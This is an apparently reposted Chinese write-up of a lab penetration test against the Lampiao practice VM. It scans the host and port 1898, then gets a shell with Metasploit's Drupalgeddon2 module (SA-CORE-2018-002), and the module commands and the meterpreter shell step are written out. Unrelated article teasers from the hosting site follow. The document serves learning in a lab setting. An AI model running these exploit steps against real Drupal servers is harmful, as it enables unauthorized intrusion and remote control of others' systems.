黑盒渗透盲打lampiao

news2024/10/6 20:31:31

一、查找主机ip，通过Nmap扫描工具排查出我的靶机的IP 为.134

python tools.py ip -i 192.168.12.0 -h 254 -l 1

二、扫描其他端口。

1898

三、查看网站漏洞情况，典型的漏洞特征

Ac扫描漏洞情况，利用典型的漏洞。

四、开始getshell

1、启动MSF

msf6 > search SA-CORE-2018-002 #查询漏洞特征模块

可以看到，有可以利用的漏洞模块。直接开搞

2、使用对应的漏洞模块

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2

3、查看并调整参数。调整参数

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

五、拿下！

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
meterpreter > shell

ls

查看系统版本。

为所欲为~~~

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/366188.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

SigmaPlot科学绘图工具：ROC曲线分析及AUC组间差异的显著性分析

目的初步使用SigmaPlot科学绘图工具；进行ROC曲线绘制并分析检验变量AUC组间差异性是否显著软件下载及安装 SigmaPlot下载安装按照这个教程即可：https://www.hhkxxw.com/24799.html 快速通道：SigmaPlot下载链接：百度网盘链接…

如何实现文件高速传输，推荐镭速高速文件传输解决方案

随着互联网的发展，文件传输越来越频繁，如何实现文件高速传输已经越来越成为企业发展过程中需要解决的问题， 在当今的业务中，随着与客户和供应商以及内部系统的所有通信的数据量不断增加，对高速文件传输解决方案的需求…

Prometheus之Alertmanager告警

告警流程 Prometheus主要是提供了数据的采集和存储，Alertmanager组件主要实现告警功能。Alertmanager 主要用于接收 Prometheus 发送的告警信息，它支持丰富的告警通知渠道，而且很容易做到告警信息进行去重，降噪，分组等…

Elasticsearch 基础（三）之相关术语概念及原理

目录前言一、集群1、相关术语概念1.1、集群（Cluster）1.2、节点（Node）1.3、角色（Roles）1.4、分片（Shard）2、集群场景及原理2.1、集群健康2.2、空节点2.3、单节点2.4、集群追加节点2.5…

【GeoDjango框架解析——读取矢量数据写入postgis数据库】

系列文章目录提示：这里可以添加系列文章的所有文章的目录，目录需要自己手动添加 geodjango框架解析之读取矢量数据shp文件写入postgis数据库提示：写完文章后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录…

我记不住的那些maven内容

背景： 之前使用maven都是基于IDE并且对maven本身也很少究其过程和原理，当出现问题也不知道如何解决，后续想使用命令行来进行操作，并通过文档记录一下学习的内容加深理解以防止忘记。一、简要介绍 maven是通过插件来增强功能&am…

项目经理该怎样做好项目质量管理工作？

项目经理做好项目质量管理工作，重点需要关注以下几个方面： 1、质量产生于过程需要成熟稳定的软件过程软件项目质量产生于开发过程，要想真正提高软件质量，必须有一个成熟而稳定的软件过程。如因特殊原因造成的过程性能不稳定&…

自动化测试框架pytest教程(一)pytest用例编写和pytest前后置方法

自动化测试框架pytest教程(一)pytest用例编写和pytest前后置方法目录：导读一、入门使用 1、环境安装 2、用例编写 3、执行测试二、前后置方法和fixture机制 1、xunit风格的前后置方法函数用例的前后置方法测试类中用例的前后置方法模块级别的前后置…

Tekton实战案例--S2I

案例环境说明示例项目： 代码仓库：https://gitee.com/mageedu/spring-boot-helloWorld.git 构建工具maven pipeline各Task git-clone：克隆项目的源代码 build-to-package: 代码测试，构建和打包 generate-build-id：生…

valgrind 移植到arm64 平台上总结

valgrind 介绍valgrind是查找内存泄漏的神器，你可以自动的检测许多内存管理和线程的bug，避免花费太多的时间在bug寻找上，使得你的程序更加稳固。下载地址：https://valgrind.org/downloads/ 本人下载的是valgrind-3.19.0valgrind编…

【Java基础下】 026 -- 集合进阶（不可变集合、Stream流、方法引用）

目录一、不可变集合 1、创建不可变集合的应用场景 2、创建不可变集合的书写格式 ①、不可变的List集合 ②、不可变的Set集合 ③、不可变的Map集合 3、小结二、Stream流 1、体验Stream流的作用 2、Stream流的思想 3、Stream流的使用步骤 ①、单列集合获取Stream流 ②、双列集合…

面试 | 递归乘法【细节决定成败】

不用[ * ]如何使两数相乘❓一、题目明细二、思路罗列 & 代码解析1、野蛮A * B【不符合题意】2、sizeof【可借鉴】解析3、简易递归【推荐】① 解析（递归展开图）② 时间复杂度分析4、移位<<运算【有挑战性💪】① 思路顺理② 算法图解…

消息队列的介绍

1.什么时候会用到消息队列？ 公司本身业务小，可以做单体的，但是后面业务体量不断扩大，采用微服务的设计思想，分布式的部署方式，所以拆分了很多的服务，随着体量的增加以及业务场景越来越复杂了&a…

SCG failure information

我们知道5G网络有独立组网和非独立组网，独立组网中不论是核心网还是接入网都是5G，但是部署成本高；非独立组网也就是双连接(MRDC)也是目前比较流行的一种方式，其中的ENDC，即E-UTRA-NRDual Connectivity，是将…

Apifox-比postman更优秀的接口自动化测试平台

一、Apifox介绍 Apifox 是 API 文档、API 调试、API Mock、API 自动化测试一体化协作平台，定位 Postman Swagger Mock JMeter。通过一套系统、一份数据，解决多个系统之间的数据同步问题。只要定义好 API 文档，API 调试、API 数据 Mock、A…

如何将Linux的NIC 名称更改为 eth0 而不是 enps33 或 enp0s25，只要几秒钟

概述我们使用Linux系统，网卡名称通常都是eth0，但是有一些新的linux发行版，网卡名字 enps33 或 enp0s25。 pengubuntu:~$ ifconfig ens33 Link encap:Ethernet HWaddr 00:0c:29:fd:4d:3a inet addr:192.168.0.113 Bcast:192.168.0.…

[NOIP2002 普及组] 过河卒

题目描述： 棋盘上 A 点有一个过河卒，需要走到目标 B 点。卒行走的规则：可以向下、或者向右。同时在棋盘上 C 点有一个对方的马，该马所在的点和所有跳跃一步可达的点称为对方马的控制点。因此称之为“马拦过河卒”。棋盘用坐标表…

上海亚商投顾：沪指窄幅震荡 ChatGPT概念股全线下挫

上海亚商投顾前言：无惧大盘涨跌，解密龙虎榜资金，跟踪一线游资和机构资金动向，识别短期热点和强势个股。市场情绪三大指数早盘小幅冲高，随后又震荡走低，午后一度集体翻绿，临近尾盘有所回升。Chat…

kettle使用--1.mysql多表关联导入mongoDB

文章目录1. 初步体验：csv 转为excelKettle概念配置mysql链接mysql 一对多关联查询结果保存到mongodb中1. 初步体验：csv 转为excel Windows环境下安装pdi-ce-8.0.0.0-28.zip ，解压后执行lib下的Spoon.bat 将csv输入拖入双击拖进去的csv&…

无聊小知识02.Junit4Junit5对比

Junit是Java编程语言的单元测试框架，用来编写单元测试代码。随着Junit5的盛行，与Junit4有何差异。JDK支持Junit4需要Java5版本Junit5需要Java8版本Maven依赖Junit4不区分模块，只有一个jar：<dependency><groupId>junit…

黑盒渗透盲打lampiao

一、查找主机ip，通过Nmap扫描工具排查出我的靶机的IP 为.134

二、扫描其他端口。

三、查看网站漏洞情况，典型的漏洞特征

四、开始getshell

五、拿下！

相关文章